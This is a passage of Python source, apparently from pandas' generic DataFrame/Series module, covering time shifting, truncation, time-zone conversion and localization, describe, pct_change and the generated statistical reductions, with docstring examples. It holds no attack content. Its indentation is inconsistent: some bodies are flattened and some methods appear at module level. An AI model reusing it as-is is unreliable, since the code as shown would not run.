Parameters
----------
periods : int
Number of periods to move, can be positive or negative.
Returns
-------
shifted : same type as caller
Notes
-----
While the `slice_shift` is faster than `shift`, you may pay for it
later during alignment.
"""
if periods == 0:
return self
if periods > 0:
vslicer = slice(None, -periods)
islicer = slice(periods, None)
else:
vslicer = slice(-periods, None)
islicer = slice(None, periods)
new_obj = self._slice(vslicer, axis=axis)
shifted_axis = self._get_axis(axis)[islicer]
new_obj.set_axis(shifted_axis, axis=axis, inplace=True)
return new_obj.__finalize__(self)
    def tshift(
        self: FrameOrSeries, periods: int = 1, freq=None, axis=0
    ) -> FrameOrSeries:
        """
        Shift the time index, using the index's frequency if available.
        Parameters
        ----------
        periods : int
            Number of periods to move, can be positive or negative.
        freq : DateOffset, timedelta, or str, default None
            Increment to use from the tseries module
            or time rule expressed as a string (e.g. 'EOM').
        axis : {0 or 'index', 1 or 'columns', None}, default 0
            Corresponds to the axis that contains the Index.
        Returns
        -------
        shifted : Series/DataFrame
        Notes
        -----
        If freq is not specified then tries to use the freq or inferred_freq
        attributes of the index. If neither of those attributes exist, a
        ValueError is thrown
        """
        index = self._get_axis(axis)
        # Fall back to the index's declared, then inferred, frequency.
        if freq is None:
            freq = getattr(index, "freq", None)
        if freq is None:
            freq = getattr(index, "inferred_freq", None)
        if freq is None:
            msg = "Freq was not given and was not set in the index"
            raise ValueError(msg)
        if periods == 0:
            return self
        if isinstance(freq, str):
            freq = to_offset(freq)
        block_axis = self._get_block_manager_axis(axis)
        if isinstance(index, PeriodIndex):
            orig_freq = to_offset(index.freq)
            if freq == orig_freq:
                # Same frequency: shift the PeriodIndex by whole periods.
                new_data = self._data.copy()
                new_data.axes[block_axis] = index.shift(periods)
            elif orig_freq is not None:
                # Shifting a PeriodIndex by a different frequency is ambiguous.
                raise ValueError(
                    f"Given freq {freq.rule_code} does not match "
                    f"PeriodIndex freq {orig_freq.rule_code}"
                )
            # NOTE(review): if ``orig_freq`` were None neither branch above
            # assigns ``new_data``; a PeriodIndex always carries a freq, so
            # this appears unreachable in practice — confirm.
        else:
            new_data = self._data.copy()
            new_data.axes[block_axis] = index.shift(periods, freq)
        return self._constructor(new_data).__finalize__(self)
    def truncate(
        self: FrameOrSeries, before=None, after=None, axis=None, copy: bool_t = True
    ) -> FrameOrSeries:
        """
        Truncate a Series or DataFrame before and after some index value.
        This is a useful shorthand for boolean indexing based on index
        values above or below certain thresholds.
        Parameters
        ----------
        before : date, str, int
            Truncate all rows before this index value.
        after : date, str, int
            Truncate all rows after this index value.
        axis : {0 or 'index', 1 or 'columns'}, optional
            Axis to truncate. Truncates the index (rows) by default.
        copy : bool, default is True,
            Return a copy of the truncated section.
        Returns
        -------
        type of caller
            The truncated Series or DataFrame.
        See Also
        --------
        DataFrame.loc : Select a subset of a DataFrame by label.
        DataFrame.iloc : Select a subset of a DataFrame by position.
        Notes
        -----
        If the index being truncated contains only datetime values,
        `before` and `after` may be specified as strings instead of
        Timestamps.
        Examples
        --------
        >>> df = pd.DataFrame({'A': ['a', 'b', 'c', 'd', 'e'],
        ...                    'B': ['f', 'g', 'h', 'i', 'j'],
        ...                    'C': ['k', 'l', 'm', 'n', 'o']},
        ...                   index=[1, 2, 3, 4, 5])
        >>> df
           A  B  C
        1  a  f  k
        2  b  g  l
        3  c  h  m
        4  d  i  n
        5  e  j  o
        >>> df.truncate(before=2, after=4)
           A  B  C
        2  b  g  l
        3  c  h  m
        4  d  i  n
        The columns of a DataFrame can be truncated.
        >>> df.truncate(before="A", after="B", axis="columns")
           A  B
        1  a  f
        2  b  g
        3  c  h
        4  d  i
        5  e  j
        For Series, only rows can be truncated.
        >>> df['A'].truncate(before=2, after=4)
        2    b
        3    c
        4    d
        Name: A, dtype: object
        The index values in ``truncate`` can be datetimes or string
        dates.
        >>> dates = pd.date_range('2016-01-01', '2016-02-01', freq='s')
        >>> df = pd.DataFrame(index=dates, data={'A': 1})
        >>> df.tail()
                             A
        2016-01-31 23:59:56  1
        2016-01-31 23:59:57  1
        2016-01-31 23:59:58  1
        2016-01-31 23:59:59  1
        2016-02-01 00:00:00  1
        >>> df.truncate(before=pd.Timestamp('2016-01-05'),
        ...             after=pd.Timestamp('2016-01-10')).tail()
                             A
        2016-01-09 23:59:56  1
        2016-01-09 23:59:57  1
        2016-01-09 23:59:58  1
        2016-01-09 23:59:59  1
        2016-01-10 00:00:00  1
        Because the index is a DatetimeIndex containing only dates, we can
        specify `before` and `after` as strings. They will be coerced to
        Timestamps before truncation.
        >>> df.truncate('2016-01-05', '2016-01-10').tail()
                             A
        2016-01-09 23:59:56  1
        2016-01-09 23:59:57  1
        2016-01-09 23:59:58  1
        2016-01-09 23:59:59  1
        2016-01-10 00:00:00  1
        Note that ``truncate`` assumes a 0 value for any unspecified time
        component (midnight). This differs from partial string slicing, which
        returns any partially matching dates.
        >>> df.loc['2016-01-05':'2016-01-10', :].tail()
                             A
        2016-01-10 23:59:55  1
        2016-01-10 23:59:56  1
        2016-01-10 23:59:57  1
        2016-01-10 23:59:58  1
        2016-01-10 23:59:59  1
        """
        if axis is None:
            # Default to the statistics axis (the rows for a DataFrame).
            axis = self._stat_axis_number
        axis = self._get_axis_number(axis)
        ax = self._get_axis(axis)
        # GH 17935
        # Check that index is sorted
        if not ax.is_monotonic_increasing and not ax.is_monotonic_decreasing:
            raise ValueError("truncate requires a sorted index")
        # if we have a date index, convert to dates, otherwise
        # treat like a slice
        if ax.is_all_dates:
            from pandas.core.tools.datetimes import to_datetime
            before = to_datetime(before)
            after = to_datetime(after)
        if before is not None and after is not None:
            if before > after:
                raise ValueError(f"Truncate: {after} must be after {before}")
        # Build a label-based slice restricted to the requested axis.
        slicer = [slice(None, None)] * self._AXIS_LEN
        slicer[axis] = slice(before, after)
        result = self.loc[tuple(slicer)]
        if isinstance(ax, MultiIndex):
            # .loc keeps the full MultiIndex levels; replace the axis with a
            # properly truncated MultiIndex.
            setattr(result, self._get_axis_name(axis), ax.truncate(before, after))
        if copy:
            result = result.copy()
        return result
    def tz_convert(
        self: FrameOrSeries, tz, axis=0, level=None, copy: bool_t = True
    ) -> FrameOrSeries:
        """
        Convert tz-aware axis to target time zone.
        Parameters
        ----------
        tz : str or tzinfo object
        axis : the axis to convert
        level : int, str, default None
            If axis is a MultiIndex, convert a specific level. Otherwise
            must be None.
        copy : bool, default True
            Also make a copy of the underlying data.
        Returns
        -------
        %(klass)s
            Object with time zone converted axis.
        Raises
        ------
        TypeError
            If the axis is tz-naive.
        """
        axis = self._get_axis_number(axis)
        ax = self._get_axis(axis)
        def _tz_convert(ax, tz):
            # Convert a single Index; non-datetime axes are only acceptable
            # when empty, in which case a fresh tz-aware DatetimeIndex is
            # substituted.
            if not hasattr(ax, "tz_convert"):
                if len(ax) > 0:
                    ax_name = self._get_axis_name(axis)
                    raise TypeError(
                        f"{ax_name} is not a valid DatetimeIndex or PeriodIndex"
                    )
                else:
                    ax = DatetimeIndex([], tz=tz)
            else:
                ax = ax.tz_convert(tz)
            return ax
        # if a level is given it must be a MultiIndex level or
        # equivalent to the axis name
        if isinstance(ax, MultiIndex):
            level = ax._get_level_number(level)
            new_level = _tz_convert(ax.levels[level], tz)
            ax = ax.set_levels(new_level, level=level)
        else:
            if level not in (None, 0, ax.name):
                raise ValueError(f"The level {level} is not valid")
            ax = _tz_convert(ax, tz)
        # Rebuild around the same data with the converted axis attached.
        result = self._constructor(self._data, copy=copy)
        result = result.set_axis(ax, axis=axis, inplace=False)
        return result.__finalize__(self)
    def tz_localize(
        self: FrameOrSeries,
        tz,
        axis=0,
        level=None,
        copy: bool_t = True,
        ambiguous="raise",
        nonexistent: str = "raise",
    ) -> FrameOrSeries:
        """
        Localize tz-naive index of a Series or DataFrame to target time zone.
        This operation localizes the Index. To localize the values in a
        timezone-naive Series, use :meth:`Series.dt.tz_localize`.
        Parameters
        ----------
        tz : str or tzinfo
        axis : the axis to localize
        level : int, str, default None
            If axis is a MultiIndex, localize a specific level. Otherwise
            must be None.
        copy : bool, default True
            Also make a copy of the underlying data.
        ambiguous : 'infer', bool-ndarray, 'NaT', default 'raise'
            When clocks moved backward due to DST, ambiguous times may arise.
            For example in Central European Time (UTC+01), when going from
            03:00 DST to 02:00 non-DST, 02:30:00 local time occurs both at
            00:30:00 UTC and at 01:30:00 UTC. In such a situation, the
            `ambiguous` parameter dictates how ambiguous times should be
            handled.
            - 'infer' will attempt to infer fall dst-transition hours based on
              order
            - bool-ndarray where True signifies a DST time, False designates
              a non-DST time (note that this flag is only applicable for
              ambiguous times)
            - 'NaT' will return NaT where there are ambiguous times
            - 'raise' will raise an AmbiguousTimeError if there are ambiguous
              times.
        nonexistent : str, default 'raise'
            A nonexistent time does not exist in a particular timezone
            where clocks moved forward due to DST. Valid values are:
            - 'shift_forward' will shift the nonexistent time forward to the
              closest existing time
            - 'shift_backward' will shift the nonexistent time backward to the
              closest existing time
            - 'NaT' will return NaT where there are nonexistent times
            - timedelta objects will shift nonexistent times by the timedelta
            - 'raise' will raise an NonExistentTimeError if there are
              nonexistent times.
            .. versionadded:: 0.24.0
        Returns
        -------
        Series or DataFrame
            Same type as the input.
        Raises
        ------
        TypeError
            If the TimeSeries is tz-aware and tz is not None.
        Examples
        --------
        Localize local times:
        >>> s = pd.Series([1],
        ...               index=pd.DatetimeIndex(['2018-09-15 01:30:00']))
        >>> s.tz_localize('CET')
        2018-09-15 01:30:00+02:00    1
        dtype: int64
        Be careful with DST changes. When there is sequential data, pandas
        can infer the DST time:
        >>> s = pd.Series(range(7),
        ...               index=pd.DatetimeIndex(['2018-10-28 01:30:00',
        ...                                       '2018-10-28 02:00:00',
        ...                                       '2018-10-28 02:30:00',
        ...                                       '2018-10-28 02:00:00',
        ...                                       '2018-10-28 02:30:00',
        ...                                       '2018-10-28 03:00:00',
        ...                                       '2018-10-28 03:30:00']))
        >>> s.tz_localize('CET', ambiguous='infer')
        2018-10-28 01:30:00+02:00    0
        2018-10-28 02:00:00+02:00    1
        2018-10-28 02:30:00+02:00    2
        2018-10-28 02:00:00+01:00    3
        2018-10-28 02:30:00+01:00    4
        2018-10-28 03:00:00+01:00    5
        2018-10-28 03:30:00+01:00    6
        dtype: int64
        In some cases, inferring the DST is impossible. In such cases, you can
        pass an ndarray to the ambiguous parameter to set the DST explicitly
        >>> s = pd.Series(range(3),
        ...               index=pd.DatetimeIndex(['2018-10-28 01:20:00',
        ...                                       '2018-10-28 02:36:00',
        ...                                       '2018-10-28 03:46:00']))
        >>> s.tz_localize('CET', ambiguous=np.array([True, True, False]))
        2018-10-28 01:20:00+02:00    0
        2018-10-28 02:36:00+02:00    1
        2018-10-28 03:46:00+01:00    2
        dtype: int64
        If the DST transition causes nonexistent times, you can shift these
        dates forward or backwards with a timedelta object or `'shift_forward'`
        or `'shift_backwards'`.
        >>> s = pd.Series(range(2),
        ...               index=pd.DatetimeIndex(['2015-03-29 02:30:00',
        ...                                       '2015-03-29 03:30:00']))
        >>> s.tz_localize('Europe/Warsaw', nonexistent='shift_forward')
        2015-03-29 03:00:00+02:00    0
        2015-03-29 03:30:00+02:00    1
        dtype: int64
        >>> s.tz_localize('Europe/Warsaw', nonexistent='shift_backward')
        2015-03-29 01:59:59.999999999+01:00    0
        2015-03-29 03:30:00+02:00              1
        dtype: int64
        >>> s.tz_localize('Europe/Warsaw', nonexistent=pd.Timedelta('1H'))
        2015-03-29 03:30:00+02:00    0
        2015-03-29 03:30:00+02:00    1
        dtype: int64
        """
        # Validate ``nonexistent`` early: a fixed set of strings or a
        # timedelta-style shift.
        nonexistent_options = ("raise", "NaT", "shift_forward", "shift_backward")
        if nonexistent not in nonexistent_options and not isinstance(
            nonexistent, timedelta
        ):
            raise ValueError(
                "The nonexistent argument must be one of 'raise', "
                "'NaT', 'shift_forward', 'shift_backward' or "
                "a timedelta object"
            )
        axis = self._get_axis_number(axis)
        ax = self._get_axis(axis)
        def _tz_localize(ax, tz, ambiguous, nonexistent):
            # Localize a single Index; non-datetime axes are only acceptable
            # when empty, in which case a fresh tz-aware DatetimeIndex is
            # substituted.
            if not hasattr(ax, "tz_localize"):
                if len(ax) > 0:
                    ax_name = self._get_axis_name(axis)
                    raise TypeError(
                        f"{ax_name} is not a valid DatetimeIndex or PeriodIndex"
                    )
                else:
                    ax = DatetimeIndex([], tz=tz)
            else:
                ax = ax.tz_localize(tz, ambiguous=ambiguous, nonexistent=nonexistent)
            return ax
        # if a level is given it must be a MultiIndex level or
        # equivalent to the axis name
        if isinstance(ax, MultiIndex):
            level = ax._get_level_number(level)
            new_level = _tz_localize(ax.levels[level], tz, ambiguous, nonexistent)
            ax = ax.set_levels(new_level, level=level)
        else:
            if level not in (None, 0, ax.name):
                raise ValueError(f"The level {level} is not valid")
            ax = _tz_localize(ax, tz, ambiguous, nonexistent)
        # Rebuild around the same data with the localized axis attached.
        result = self._constructor(self._data, copy=copy)
        result = result.set_axis(ax, axis=axis, inplace=False)
        return result.__finalize__(self)
# ----------------------------------------------------------------------
# Numeric Methods
def abs(self: FrameOrSeries) -> FrameOrSeries:
    """
    Return a Series/DataFrame with absolute numeric value of each element.

    This function only applies to elements that are all numeric.

    Returns
    -------
    abs
        Series/DataFrame containing the absolute value of each element.

    See Also
    --------
    numpy.absolute : Calculate the absolute value element-wise.

    Notes
    -----
    For ``complex`` inputs, ``1.2 + 1j``, the absolute value is
    :math:`\\sqrt{ a^2 + b^2 }`.

    Examples
    --------
    Absolute numeric values in a Series.

    >>> s = pd.Series([-1.10, 2, -3.33, 4])
    >>> s.abs()
    0    1.10
    1    2.00
    2    3.33
    3    4.00
    dtype: float64

    Absolute numeric values in a Series with a Timedelta element.

    >>> s = pd.Series([pd.Timedelta('1 days')])
    >>> s.abs()
    0   1 days
    dtype: timedelta64[ns]
    """
    # The element-wise absolute value is delegated entirely to numpy,
    # which hands control back to the pandas object's ufunc handling.
    return np.abs(self)
def describe(
    self: FrameOrSeries, percentiles=None, include=None, exclude=None
) -> FrameOrSeries:
    """
    Generate descriptive statistics.

    Descriptive statistics include those that summarize the central
    tendency, dispersion and shape of a dataset's distribution,
    excluding ``NaN`` values. Both numeric and object series are
    analyzed, as well as ``DataFrame`` column sets of mixed data types;
    the output varies with what is provided.

    Parameters
    ----------
    percentiles : list-like of numbers, optional
        The percentiles to include in the output. All should fall
        between 0 and 1. The default is ``[.25, .5, .75]``, which
        returns the 25th, 50th, and 75th percentiles.
    include : 'all', list-like of dtypes or None (default), optional
        A white list of data types to include in the result. Ignored
        for ``Series``. ``'all'`` includes every input column; a
        list-like of dtypes limits the result to those dtypes (strings
        in the style of ``select_dtypes`` also work, e.g.
        ``df.describe(include=['O'])``); ``None`` includes all numeric
        columns.
    exclude : list-like of dtypes or None (default), optional
        A black list of data types to omit from the result. Ignored
        for ``Series``. ``None`` excludes nothing.

    Returns
    -------
    Series or DataFrame
        Summary statistics of the Series or Dataframe provided.

    See Also
    --------
    DataFrame.count : Count number of non-NA/null observations.
    DataFrame.max : Maximum of the values in the object.
    DataFrame.min : Minimum of the values in the object.
    DataFrame.mean : Mean of the values.
    DataFrame.std : Standard deviation of the observations.
    DataFrame.select_dtypes : Subset of a DataFrame including/excluding
        columns based on their dtype.

    Notes
    -----
    For numeric data, the result's index includes ``count``, ``mean``,
    ``std``, ``min``, ``max`` as well as the requested percentiles
    (the median is always included). For object data the index includes
    ``count``, ``unique``, ``top`` and ``freq``; timestamps
    additionally get ``first`` and ``last``. For mixed-type DataFrames
    only numeric columns are analyzed by default; pass
    ``include='all'`` for a union of attributes of each type.
    """
    if self.ndim == 2 and self.columns.size == 0:
        raise ValueError("Cannot describe a DataFrame without columns")

    # Normalize the percentile list: explicit list, validated to lie in
    # [0, 1], with the median always present; quartiles when nothing
    # was given.
    if percentiles is None:
        percentiles = np.array([0.25, 0.5, 0.75])
    else:
        percentiles = list(percentiles)
        validate_percentile(percentiles)
        if 0.5 not in percentiles:
            percentiles.append(0.5)
        percentiles = np.asarray(percentiles)

    # np.unique both sorts and deduplicates; a shrunken result means
    # duplicates were present.
    unique_pcts = np.unique(percentiles)
    if len(unique_pcts) < len(percentiles):
        raise ValueError("percentiles cannot contain duplicates")
    percentiles = unique_pcts

    formatted_percentiles = format_percentiles(percentiles)

    def _numeric_summary(series):
        # count/mean/std/min, the requested percentiles, then max.
        index = ["count", "mean", "std", "min"] + formatted_percentiles + ["max"]
        values = (
            [series.count(), series.mean(), series.std(), series.min()]
            + series.quantile(percentiles).tolist()
            + [series.max()]
        )
        return pd.Series(values, index=index, name=series.name)

    def _categorical_summary(data):
        counts = data.value_counts()
        n_unique = len(counts[counts != 0])
        index = ["count", "unique"]
        values = [data.count(), n_unique]
        dtype = None
        if n_unique > 0:
            index += ["top", "freq"]
            values += [counts.index[0], counts.iloc[0]]
        else:
            # Empty input: keep the output shape stable by emitting NaN
            # placeholders for 'top' and 'freq'.
            index += ["top", "freq"]
            values += [np.nan, np.nan]
            dtype = "object"
        return pd.Series(values, index=index, name=data.name, dtype=dtype)

    def _timestamp_summary(data):
        # GH-30164
        index = ["count", "mean", "min"] + formatted_percentiles + ["max"]
        values = (
            [data.count(), data.mean(), data.min()]
            + data.quantile(percentiles).tolist()
            + [data.max()]
        )
        return pd.Series(values, index=index, name=data.name)

    def _summarize(data):
        # Dispatch on dtype: bool is summarized like a categorical,
        # timedelta like a numeric column.
        if is_bool_dtype(data):
            return _categorical_summary(data)
        if is_numeric_dtype(data):
            return _numeric_summary(data)
        if is_datetime64_any_dtype(data):
            return _timestamp_summary(data)
        if is_timedelta64_dtype(data):
            return _numeric_summary(data)
        return _categorical_summary(data)

    if self.ndim == 1:
        return _summarize(self)

    # Select the columns to analyze.
    if include is None and exclude is None:
        # When some numerics are found, keep only numerics.
        data = self.select_dtypes(include=[np.number])
        if len(data.columns) == 0:
            data = self
    elif include == "all":
        if exclude is not None:
            raise ValueError("exclude must be None when include is 'all'")
        data = self
    else:
        data = self.select_dtypes(include=include, exclude=exclude)

    ldesc = [_summarize(col) for _, col in data.items()]

    # Build a convenient row order: walk summaries from shortest to
    # longest, preserving first-seen order of the statistic names.
    names: List[Optional[Hashable]] = []
    for idxnames in sorted((x.index for x in ldesc), key=len):
        for name in idxnames:
            if name not in names:
                names.append(name)

    d = pd.concat([x.reindex(names, copy=False) for x in ldesc], axis=1, sort=False)
    d.columns = data.columns.copy()
    return d
_shared_docs[
"pct_change"
] = """
Percentage change between the current and a prior element.
Computes the percentage change from the immediately previous row by
default. This is useful in comparing the percentage of change in a time
series of elements.
Parameters
----------
periods : int, default 1
Periods to shift for forming percent change.
fill_method : str, default 'pad'
How to handle NAs before computing percent changes.
limit : int, default None
The number of consecutive NAs to fill before stopping.
freq : DateOffset, timedelta, or str, optional
Increment to use from time series API (e.g. 'M' or BDay()).
**kwargs
Additional keyword arguments are passed into
`DataFrame.shift` or `Series.shift`.
Returns
-------
chg : Series or DataFrame
The same type as the calling object.
See Also
--------
Series.diff : Compute the difference of two elements in a Series.
DataFrame.diff : Compute the difference of two elements in a DataFrame.
Series.shift : Shift the index by some number of periods.
DataFrame.shift : Shift the index by some number of periods.
Examples
--------
**Series**
>>> s = pd.Series([90, 91, 85])
>>> s
0 90
1 91
2 85
dtype: int64
>>> s.pct_change()
0 NaN
1 0.011111
2 -0.065934
dtype: float64
>>> s.pct_change(periods=2)
0 NaN
1 NaN
2 -0.055556
dtype: float64
See the percentage change in a Series where filling NAs with last
valid observation forward to next valid.
>>> s = pd.Series([90, 91, None, 85])
>>> s
0 90.0
1 91.0
2 NaN
3 85.0
dtype: float64
>>> s.pct_change(fill_method='ffill')
0 NaN
1 0.011111
2 0.000000
3 -0.065934
dtype: float64
**DataFrame**
Percentage change in French franc, Deutsche Mark, and Italian lira from
1980-01-01 to 1980-03-01.
>>> df = pd.DataFrame({
... 'FR': [4.0405, 4.0963, 4.3149],
... 'GR': [1.7246, 1.7482, 1.8519],
... 'IT': [804.74, 810.01, 860.13]},
... index=['1980-01-01', '1980-02-01', '1980-03-01'])
>>> df
FR GR IT
1980-01-01 4.0405 1.7246 804.74
1980-02-01 4.0963 1.7482 810.01
1980-03-01 4.3149 1.8519 860.13
>>> df.pct_change()
FR GR IT
1980-01-01 NaN NaN NaN
1980-02-01 0.013810 0.013684 0.006549
1980-03-01 0.053365 0.059318 0.061876
Percentage of change in GOOG and APPL stock volume. Shows computing
the percentage change between columns.
>>> df = pd.DataFrame({
... '2016': [1769950, 30586265],
... '2015': [1500923, 40912316],
... '2014': [1371819, 41403351]},
... index=['GOOG', 'APPL'])
>>> df
2016 2015 2014
GOOG 1769950 1500923 1371819
APPL 30586265 40912316 41403351
>>> df.pct_change(axis='columns')
2016 2015 2014
GOOG NaN -0.151997 -0.086016
APPL NaN 0.337604 0.012002
"""
@Appender(_shared_docs["pct_change"] % _shared_doc_kwargs)
def pct_change(
    self: FrameOrSeries,
    periods=1,
    fill_method="pad",
    limit=None,
    freq=None,
    **kwargs,
) -> FrameOrSeries:
    # Axis may arrive via **kwargs; default to the stat axis.
    axis = self._get_axis_number(kwargs.pop("axis", self._stat_axis_name))

    # Optionally fill NAs before computing the change.
    data = (
        self
        if fill_method is None
        else self._ensure_type(
            self.fillna(method=fill_method, axis=axis, limit=limit)
        )
    )

    shifted = data.shift(periods=periods, freq=freq, axis=axis, **kwargs)
    rs = data.div(shifted) - 1

    if freq is not None:
        # Shift behaves differently when freq is given (it reindexes);
        # drop the resulting duplicates and restore the original index.
        rs = rs.loc[~rs.index.duplicated()]
        rs = rs.reindex_like(data)
    return rs
def _agg_by_level(self, name, axis=0, level=0, skipna=True, **kwargs):
if axis is None:
raise ValueError("Must specify 'axis' when aggregating by level.")
grouped = self.groupby(level=level, axis=axis, sort=False)
if hasattr(grouped, name) and skipna:
return getattr(grouped, name)(**kwargs)
axis = self._get_axis_number(axis)
method = getattr(type(self), name)
applyf = lambda x: method(x, axis=axis, skipna=skipna, **kwargs)
return grouped.aggregate(applyf)
@classmethod
def _add_numeric_operations(cls):
    """
    Add the operations to the cls; evaluate the doc strings again
    """
    # Substitution values shared by every generated docstring below.
    axis_descr, name, name2 = _doc_parms(cls)

    # Logical reductions: any()/all() differ only in the nanops reducer
    # and in the value reported for an all-NA/empty axis.
    cls.any = _make_logical_function(
        cls,
        "any",
        name,
        name2,
        axis_descr,
        _any_desc,
        nanops.nanany,
        _any_see_also,
        _any_examples,
        empty_value=False,
    )
    cls.all = _make_logical_function(
        cls,
        "all",
        name,
        name2,
        axis_descr,
        _all_desc,
        nanops.nanall,
        _all_see_also,
        _all_examples,
        empty_value=True,
    )

    # mad() is written out by hand (not via a _make_* factory) because it
    # composes two reductions: a mean, then a mean of absolute deviations.
    @Substitution(
        desc="Return the mean absolute deviation of the values "
        "for the requested axis.",
        name1=name,
        name2=name2,
        axis_descr=axis_descr,
        min_count="",
        see_also="",
        examples="",
    )
    @Appender(_num_doc_mad)
    def mad(self, axis=None, skipna=None, level=None):
        # Resolve lazy defaults for skipna and axis.
        if skipna is None:
            skipna = True
        if axis is None:
            axis = self._stat_axis_number
        if level is not None:
            # Aggregate within each group of the given MultiIndex level.
            return self._agg_by_level("mad", axis=axis, level=level, skipna=skipna)

        data = self._get_numeric_data()
        if axis == 0:
            demeaned = data - data.mean(axis=0)
        else:
            # Row-wise: subtract each row's mean, broadcasting along axis 0.
            demeaned = data.sub(data.mean(axis=1), axis=0)
        return np.abs(demeaned).mean(axis=axis, skipna=skipna)

    cls.mad = mad

    # Reductions that take a ddof (delta degrees of freedom) argument.
    cls.sem = _make_stat_function_ddof(
        cls,
        "sem",
        name,
        name2,
        axis_descr,
        "Return unbiased standard error of the mean over requested "
        "axis.\n\nNormalized by N-1 by default. This can be changed "
        "using the ddof argument",
        nanops.nansem,
    )
    cls.var = _make_stat_function_ddof(
        cls,
        "var",
        name,
        name2,
        axis_descr,
        "Return unbiased variance over requested axis.\n\nNormalized by "
        "N-1 by default. This can be changed using the ddof argument",
        nanops.nanvar,
    )
    cls.std = _make_stat_function_ddof(
        cls,
        "std",
        name,
        name2,
        axis_descr,
        "Return sample standard deviation over requested axis."
        "\n\nNormalized by N-1 by default. This can be changed using the "
        "ddof argument",
        nanops.nanstd,
    )

    # Cumulative accumulators; each receives the accumulating numpy
    # callable plus identity/NA fill values used by the factory.
    cls.cummin = _make_cum_function(
        cls,
        "cummin",
        name,
        name2,
        axis_descr,
        "minimum",
        np.minimum.accumulate,
        "min",
        np.inf,
        np.nan,
        _cummin_examples,
    )
    cls.cumsum = _make_cum_function(
        cls,
        "cumsum",
        name,
        name2,
        axis_descr,
        "sum",
        np.cumsum,
        "sum",
        0.0,
        np.nan,
        _cumsum_examples,
    )
    cls.cumprod = _make_cum_function(
        cls,
        "cumprod",
        name,
        name2,
        axis_descr,
        "product",
        np.cumprod,
        "prod",
        1.0,
        np.nan,
        _cumprod_examples,
    )
    cls.cummax = _make_cum_function(
        cls,
        "cummax",
        name,
        name2,
        axis_descr,
        "maximum",
        np.maximum.accumulate,
        "max",
        -np.inf,
        np.nan,
        _cummax_examples,
    )

    # Plain reductions; sum/prod additionally accept min_count.
    cls.sum = _make_min_count_stat_function(
        cls,
        "sum",
        name,
        name2,
        axis_descr,
        """Return the sum of the values for the requested axis.\n
This is equivalent to the method ``numpy.sum``.""",
        nanops.nansum,
        _stat_func_see_also,
        _sum_examples,
    )
    cls.mean = _make_stat_function(
        cls,
        "mean",
        name,
        name2,
        axis_descr,
        "Return the mean of the values for the requested axis.",
        nanops.nanmean,
    )
    cls.skew = _make_stat_function(
        cls,
        "skew",
        name,
        name2,
        axis_descr,
        "Return unbiased skew over requested axis.\n\nNormalized by N-1.",
        nanops.nanskew,
    )
    cls.kurt = _make_stat_function(
        cls,
        "kurt",
        name,
        name2,
        axis_descr,
        "Return unbiased kurtosis over requested axis.\n\n"
        "Kurtosis obtained using Fisher's definition of\n"
        "kurtosis (kurtosis of normal == 0.0). Normalized "
        "by N-1.",
        nanops.nankurt,
    )
    # kurtosis is an alias for kurt.
    cls.kurtosis = cls.kurt
    cls.prod = _make_min_count_stat_function(
        cls,
        "prod",
        name,
        name2,
        axis_descr,
        "Return the product of the values for the requested axis.",
        nanops.nanprod,
        examples=_prod_examples,
    )
    # product is an alias for prod.
    cls.product = cls.prod
    cls.median = _make_stat_function(
        cls,
        "median",
        name,
        name2,
        axis_descr,
        "Return the median of the values for the requested axis.",
        nanops.nanmedian,
    )
    cls.max = _make_stat_function(
        cls,
        "max",
        name,
        name2,
        axis_descr,
        """Return the maximum of the values for the requested axis.\n
If you want the *index* of the maximum, use ``idxmax``. This is
the equivalent of the ``numpy.ndarray`` method ``argmax``.""",
        nanops.nanmax,
        _stat_func_see_also,
        _max_examples,
    )
    cls.min = _make_stat_function(
        cls,
        "min",
        name,
        name2,
        axis_descr,
        """Return the minimum of the values for the requested axis.\n
If you want the *index* of the minimum, use ``idxmin``. This is
the equivalent of the ``numpy.ndarray`` method ``argmin``.""",
        nanops.nanmin,
        _stat_func_see_also,
        _min_examples,
    )
@classmethod
def _add_series_or_dataframe_operations(cls):
    """
    Add the series or dataframe only operations to the cls; evaluate
    the doc strings again.
    """
    # Imported here rather than at module top — presumably to avoid a
    # circular import with pandas.core.window; confirm before moving.
    from pandas.core.window import EWM, Expanding, Rolling, Window

    @Appender(Rolling.__doc__)
    def rolling(
        self,
        window,
        min_periods=None,
        center=False,
        win_type=None,
        on=None,
        axis=0,
        closed=None,
    ):
        axis = self._get_axis_number(axis)
        # A win_type selects the weighted Window variant; otherwise the
        # plain Rolling object is returned. Arguments are forwarded
        # unchanged in both branches.
        if win_type is not None:
            return Window(
                self,
                window=window,
                min_periods=min_periods,
                center=center,
                win_type=win_type,
                on=on,
                axis=axis,
                closed=closed,
            )

        return Rolling(
            self,
            window=window,
            min_periods=min_periods,
            center=center,
            win_type=win_type,
            on=on,
            axis=axis,
            closed=closed,
        )

    cls.rolling = rolling

    @Appender(Expanding.__doc__)
    def expanding(self, min_periods=1, center=False, axis=0):
        axis = self._get_axis_number(axis)
        return Expanding(self, min_periods=min_periods, center=center, axis=axis)

    cls.expanding = expanding

    @Appender(EWM.__doc__)
    def ewm(
        self,
        com=None,
        span=None,
        halflife=None,
        alpha=None,
        min_periods=0,
        adjust=True,
        ignore_na=False,
        axis=0,
    ):
        axis = self._get_axis_number(axis)
        return EWM(
            self,
            com=com,
            span=span,
            halflife=halflife,
            alpha=alpha,
            min_periods=min_periods,
            adjust=adjust,
            ignore_na=ignore_na,
            axis=axis,
        )

    cls.ewm = ewm
@Appender(_shared_docs["transform"] % dict(axis="", **_shared_doc_kwargs))
def transform(self, func, *args, **kwargs):
    # Run the function through .agg; a transform must stay elementwise,
    # so any result that collapsed to a scalar or changed length is
    # rejected.
    aggregated = self.agg(func, *args, **kwargs)
    collapsed = is_scalar(aggregated) or len(aggregated) != len(self)
    if collapsed:
        raise ValueError("transforms cannot produce aggregated results")
    return aggregated
# ----------------------------------------------------------------------
# Misc methods

# Shared docstring template for first_valid_index / last_valid_index;
# %(position)s and %(klass)s are filled in at the call sites below.
_shared_docs[
    "valid_index"
] = """
Return index for %(position)s non-NA/null value.
Returns
-------
scalar : type of index
Notes
-----
If all elements are non-NA/null, returns None.
Also returns None for empty %(klass)s.
"""
def _find_valid_index(self, how: str):
    """
    Retrieve the index label of the first or last valid (non-NA) value.

    Parameters
    ----------
    how : {'first', 'last'}
        Whether to look for the first or the last valid value.

    Returns
    -------
    idx : type of index, or None when no valid position is found.
    """
    pos = find_valid_index(self._values, how)
    return None if pos is None else self.index[pos]
@Appender(
    _shared_docs["valid_index"] % {"position": "first", "klass": "Series/DataFrame"}
)
def first_valid_index(self):
    # Delegate to the shared first/last valid-value lookup helper.
